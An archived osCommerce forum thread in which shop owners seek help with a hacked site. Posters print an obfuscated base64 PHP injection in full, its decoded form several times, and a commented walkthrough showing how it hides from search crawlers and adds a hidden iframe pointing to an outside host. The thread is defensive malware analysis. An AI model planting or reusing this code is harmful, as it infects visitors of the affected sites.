Jump to content

Archived

This topic is now archived and is closed to further replies.

migmel

base 64 infection

Recommended Posts

Hi,

 

So we found that our site ( www.toyvisionmex.com ) was beign redirected to some site of freescanvirus when accessed from explorer, we analized our php, found the malicious code and delete it, however we have not beign able to decode it to find the files that are causing the problem or giving access to the hack.

 

Wonder if any of you could help us decoding this code to find those files... ( we have already tryed some decoding tools, but the code is obfuscated )

 

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2NiU3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRSU2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>

 

 

Thank you!

Share this post


Link to post
Share on other sites

Hi,

Wonder if any of you could help us decoding this code to find those files... ( we have already tryed some decoding tools, but the code is obfuscated )

 

My antivirus program wont let me decode this, it say it is a "JS/TrojanDownloader.Iframe.NHG trojan"

This is what I could get out of this code:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){  	if(!function_exists('gml')){ 	function gml(){  	if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){   	return '<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>';  	}  	return ""; 	}	}    	if(!function_exists('gzdecode')){ 	function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){  	[email="$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1"]$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1[/email]));  	$RBE4C4D037E939226F65812885A53DAD9=10;  	$RA3D52E52A48936CDE0F5356BB08652F2=0;  	if($R30B2AB8DC1496D06B230A71D8962AF5D&4){   	[email="$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack("]$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2[/email]));   	$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];   	$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;  	}  	if($R30B2AB8DC1496D06B230A71D8962AF5D&8){   	[email="$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1"]$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1[/email];  	}  	if($R30B2AB8DC1496D06B230A71D8962AF5D&16){   	[email="$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1"]$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1[/email];  	}  	if($R30B2AB8DC1496D06B230A71D8962AF5D&2){   	$RBE4C4D037E939226F65812885A53DAD9+=2;  	}  	[email="$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9"]$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9[/email]));  	if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){   	$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;  	}  	return $R034AE2AB94F99CC81B389A1822DA3353; 	}	}	function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ 	Header('Content-Encoding: none'); 	$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);   	if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){  	return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); 	}else{  	return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); 	}	}	ob_start('mrobh');   }  }


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

My antivirus program wont let me decode this, it say it is a "JS/TrojanDownloader.Iframe.NHG trojan"

This is what I could get out of this code:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){  	if(!function_exists('gml')){ 	function gml(){  	if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){   	return '<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>';  	}  	return ""; 	}	}    	if(!function_exists('gzdecode')){ 	function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){  	[email="$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1"]$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1[/email]));  	$RBE4C4D037E939226F65812885A53DAD9=10;  	$RA3D52E52A48936CDE0F5356BB08652F2=0;  	if($R30B2AB8DC1496D06B230A71D8962AF5D&4){   	[email="$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack("]$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2[/email]));   	$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];   	$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;  	}  	if($R30B2AB8DC1496D06B230A71D8962AF5D&8){   	[email="$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1"]$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1[/email];  	}  	if($R30B2AB8DC1496D06B230A71D8962AF5D&16){   	[email="$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1"]$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1[/email];  	}  	if($R30B2AB8DC1496D06B230A71D8962AF5D&2){   	$RBE4C4D037E939226F65812885A53DAD9+=2;  	}  	[email="$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9"]$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9[/email]));  	if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){   	$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;  	}  	return $R034AE2AB94F99CC81B389A1822DA3353; 	}	}	function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ 	Header('Content-Encoding: none'); 	$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);   	if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){  	return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); 	}else{  	return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); 	}	}	ob_start('mrobh');   }  }

 

Same result we where getting from online decoders...

 

Thank you for replying and for your recommendations sijo!

Share this post


Link to post
Share on other sites

You're best option is to wipe the site clean and restore from a known clean backup. Hackers commonly install 'back doors' that will allow them in even after you have cleansed everything.

 

 

Do not know if we have one completely clean, but I will try to do that, thank you

Share this post


Link to post
Share on other sites

Same result we where getting from online decoders...

I'm not sure what the problem is. Once you've done a base64 decode, it's just PHP code with a bit of escaped JavaScript. The majority of the complexity is from the fact that it processes page output that has been gzip compressed.

 

The basic hack is that it adds this piece of HTML to the output page:

 

<iframe src="http://bibzopl.com/in.php" width=1 height=1 frameborder=0></iframe>

 

Here's the actual source code of the hack, with comments added and variable names de-obfuscated:

 

// Since this hack depends upon the ob_start() function, it does nothing if
// ob_start() is not defined. The 'mr_no' global is a flag to ensure we only run
// this code once per page.

if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {

 // Set flag to indicate we've already added the hack code.
 $GLOBALS['mr_no'] = 1;

 // Another duplication check
 if (!function_exists('mrobh')) {

   // Define the gml() function, which returns the string with the malicious code

   if (!function_exists('gml')) {
     // gml() returns malicious JavaScript code -unless- the requester is
     // Google or Yahoo. It doesn't want the bots to see the hack because
     // they'll take action on it. Here is the malicious JavaScript code in
     // unescaped form:
     //   document.write('<iframe src="http://bibzopl.com/in.php" width=1 height=1 frameborder=0></iframe>');      
     function gml() {
       if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
         return '<script language="javascript">eval(unescape("%64%6F% [...snipped...] %29%3B"))</script>';
       }
       return "";
     }
   }

   // Ensure there is a gzdecode function. Since gzdecode is a PHP 6 function,
   // we will almost always use this version. Note that this version differs 
   // from the PHP 6 version in that it just returns the input string if the
   // string is not already gzip encoded. Thus, in PHP 6, this hack is broken
   // for gzip encoded pages.

   if (!function_exists('gzdecode')) {
     function gzdecode($input_str) {
       // Assume it is gzip encoded and set the gzinflate start position accordingly
       $ascii_third_char = @ord(@substr($input_str, 3, 1));
       $start_pos = 10;
       $unused_var = 0;
       if ($ascii_third_char & 4) {
         $tmp = @unpack('v', substr($input_str, 10, 2));
         $tmp = $tmp[1];
         $start_pos += 2 + $tmp;
       }
       if($ascii_third_char & 8) {
         $start_pos = @strpos($input_str, chr(0), $start_pos) + 1;
       }
       if($ascii_third_char & 16) {
         $start_pos = @strpos($input_str, chr(0), $start_pos) + 1;
       }
       if($ascii_third_char & 2) {
         $start_pos += 2;
       }
       // Now unzip the input string. If it fails, we assume the input string
       // is not compressed and just return the original input string.
       $retval = @gzinflate(@substr($input_str, $start_pos));
       if($retval === FALSE) {
         $retval = $input_str;
       }
       return $retval;
     }
   }

   // This function takes the un-hacked page output and inserts
   // the malicious code. It is configured by ob_start(), and is
   // called with the buffered page text as input.

   function mrobh($page_output) {
     // We are sending the output in plain text, so be sure to change the
     // content encoding to indicate that.
     Header('Content-Encoding: none');
     // If the output is compressed, unzip it
     $hacked_output = gzdecode($page_output);
     // Append the malicious code at the end of the page, or just before the
     // HTML </body> tag (if one exists)
     if (preg_match('/\<\/body/si', $hacked_output)) {
       return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $hacked_output);
     } else {
       return $hacked_output . gml();
     }
   }

   // This statement forces output to be buffered and tells the PHP
   // processor to call the mrobh() function (defined above) when
   // page processing is complete.

   ob_start('mrobh');
 }
}


Check out Chad's News.

Share this post


Link to post
Share on other sites

I'm not sure what the problem is. Once you've done a base64 decode, it's just PHP code with a bit of escaped JavaScript. The majority of the complexity is from the fact that it processes page output that has been gzip compressed.

 

The basic hack is that it adds this piece of HTML to the output page...

 

 

Awesome, thank you very much for your help, hope my site is not infected anymore, we have deleted this code from all the infected files...

Share this post


Link to post
Share on other sites

Hello,

 

Any way of doing it so, that know one can put this again?

 

Thank you

Share this post


Link to post
Share on other sites

Yes, there is a way to prevent this from happening again:

 

 

Read this:

 

http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/page__st__350

 

and this:

 

http://forums.oscommerce.com/index.php?showtopic=340995

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Hello,

 

I have the same problem with my website - http://www.damefatale.com/catalog - Google has flagged my site having malware. I am really no good at understanding website code. I built my catalog via the OScommerece download package here so I really do not understand reading PHP files very well.

 

My boyfriend helped me remove some of the malicious code that someone in the Google help forums help me locate by view source of my catalog. They told me where to look, we found the code removed it but everytime you load my site on FIREFOX it reloads the script with the malware.

 

There is some hacker coding embedded into my PHP? files I assume somewhere in my catalog and I don't know how to go about finding it.

 

Is the best way to fix my site and get rid of the malware to reinstall the entire OSCommerce files? I have the 2.2 revised copy from back in '08 but I don't want to lose all the edits that were made to my site.

 

Can someone please help me clean out this malware and how to locate or please tell me which PHP files need to be replaced?

 

It seems OP had a very similar issue as I am having now.

 

Thank you for your help in advance!!!

 

~Annissë

Share this post


Link to post
Share on other sites

Annette,

 

Your BEST solution is to delete the site and rebuild it. I say this because in most cases, you will not be able to find all of the code. Even if you did, hackers often leave 'back-doors' so they can re-enter and re-infect the site once you have cleaned it. Another reason is, you will need to implement the most recent security changes to prevent such attacks. So, using RC2a and applying the necessary security changes will make your site much stronger in the long run.

 

If you create a new site, add the contributions that you currently have in your old site, you can more than likely use the database you currently have. This way you don't have to add your catalog again .

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Hi Chris!

 

 

Thank you for your reply. So being the novice that I am at building websites :) would I reinstall ALL files from RC2a? Well, all except the images folder??

 

and then go into my catalog database files and upload the latest one?

 

Really sorry, but I kinda literally need a baby step by step walk through of exactly what I have to do to rebuild my site without losing all my new edits.

 

I would appreciate yours or another persons help so much!

 

Thank you!

~Annissë

Share this post


Link to post
Share on other sites

Can someone please help me clean out this malware and how to locate or please tell me which PHP files need to be replaced?

 

Thank you for your help in advance!!!

 

You have got the following infection:

 

Trojan-Downloader:JS/Agent.D

 

Name : Trojan-Downloader:JS/Agent.D

Category: Malware

Type : Trojan-Downloader

Platform: JS

 

The best way is as said, erase all files and catalogs and then reinstall your site again.

Before you eventually does that, I would like you to try my contribution osCommerce VTS

This contributions will scan your whole site for malicious code and files. There is two scanners in this package, try them both and go through the reports they make and see if this could help you find the infection(s).

 

I would appreciate if you also PM me those reports, just to see how this contribution works on a real infected site.

 

Good luck!


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

 

 

Hi Stein

 

Well done for creating your VTS add-on. I wonder if you would state how useful you feel that add-on is.

 

My thoughts are if a site is properly secured and maintainers have proper anti-viri on their pc`s, they will never get any infection & SiteMonitor http://addons.oscommerce.com/info/4441 would be sufficient to see any attack.

 

If a site has been attacked due to a maintainers carelessnes it would be useful in identifying the viri infection, but as you stated the best cleaning method is to get the host to wipe the site anyway.

 

Is there something about that add-on I`m missing? cool.gif


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Well done for creating your VTS add-on. I wonder if you would state how useful you feel that add-on is.

 

My thoughts are if a site is properly secured and maintainers have proper anti-viri on their pc`s, they will never get any infection & SiteMonitor http://addons.oscommerce.com/info/4441 would be sufficient to see any attack.

 

If a site has been attacked due to a maintainers carelessnes it would be useful in identifying the viri infection, but as you stated the best cleaning method is to get the host to wipe the site anyway.

 

Is there something about that add-on I`m missing? cool.gif

 

I think VTS is useful as a supplement to e.g. Sitemonitor since it scan for more threats.

I use Sitemonitor and VTS on a daily basis, and VTS picks up more possible threats than Sitemonitor.

I feel more safe using VTS since it hopefully will warn me at an early stage of possible hacks.

 

I agree with you when i comes to installing all security implementation for osCommerce, but we will never be total protected.

 

What VTS does:

* Scan for known *.php hacker files

* Scan for known hacker sites & IP's

* Scan for known suspicious code

* Scan all types of files on your site (Not only php files)

* Scan for open tag inside GIF image

* Scan for possible shell execution

* Scan for suspicious COOKIE references

...and more to come..


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

I think VTS is useful as a supplement to e.g. Sitemonitor since it scan for more threats.

I use Sitemonitor and VTS on a daily basis, and VTS picks up more possible threats than Sitemonitor.

I feel more safe using VTS since it hopefully will warn me at an early stage of possible hacks.

 

I agree with you when i comes to installing all security implementation for osCommerce, but we will never be total protected.

 

What VTS does:

* Scan for known *.php hacker files

* Scan for known hacker sites & IP's

* Scan for known suspicious code

* Scan all types of files on your site (Not only php files)

* Scan for open tag inside GIF image

* Scan for possible shell execution

* Scan for suspicious COOKIE references

...and more to come..

 

Sounds good, I note currently you have no support thread for it, do you plan to start one?


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Sounds good, I note currently you have no support thread for it, do you plan to start one?

 

Yes, if there will be any requirement for it.

My problem can be the language since I'm Norwegian and my english is not that good..blink.gif


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

Thanks Stein for your help! I will try your VTS contribution out. Do I just install it and then I can start the scan from there?

 

Yes I can send you the reports too.

 

OK but overall I am hacked and need to rebuild my site. Do I upload everything from my original RC2a files all EXCEPT my images? and I will not lose the edits made to my site?

 

I want to make sure when I rebuild the site I do not lose the edits made to my site?

 

Hope you can understand what I mean. :)

 

Thank you.

~A

Share this post


Link to post
Share on other sites

Yes, if there will be any requirement for it.

My problem can be the language since I'm Norwegian and my english is not that good..blink.gif

 

 

Personally I advise people not to use add-ons that have no support thread as if there are any issues your stuck, you can post but the chances are the author will never stumble across it.

 

IE without a support thread you wont be aware of issues others are having and if you do answer any random posts on issues others are'nt helped unless they happen to find that post. wink.gif

 

 

Google is quite good at translating.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Personally I advise people not to use add-ons that have no support thread as if there are any issues your stuck, you can post but the chances are the author will never stumble across it.

 

IE without a support thread you wont be aware of issues others are having and if you do answer any random posts on issues others are'nt helped unless they happen to find that post. wink.gif .

 

I give in to pressure cool.gif Consider it done...


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

You do not have to start a support thread if you prefer not to. I usually tell my clients to avoid any contribution that has a large support thread, (or lots of updates) in the contributions area.


Help shape the future of Phoenix; join the Phoenix Club

Share this post


Link to post
Share on other sites

You do not have to start a support thread if you prefer not to. I usually tell my clients to avoid any contribution that has a large support thread, (or lots of updates) in the contributions area.

 

I wanted to do it, but it was my language that held me back..


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

Thanks Stein for your help! I will try your VTS contribution out. Do I just install it and then I can start the scan from there?

 

Yes I can send you the reports too.

 

How did it go? Did you find the fly.php file?


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

×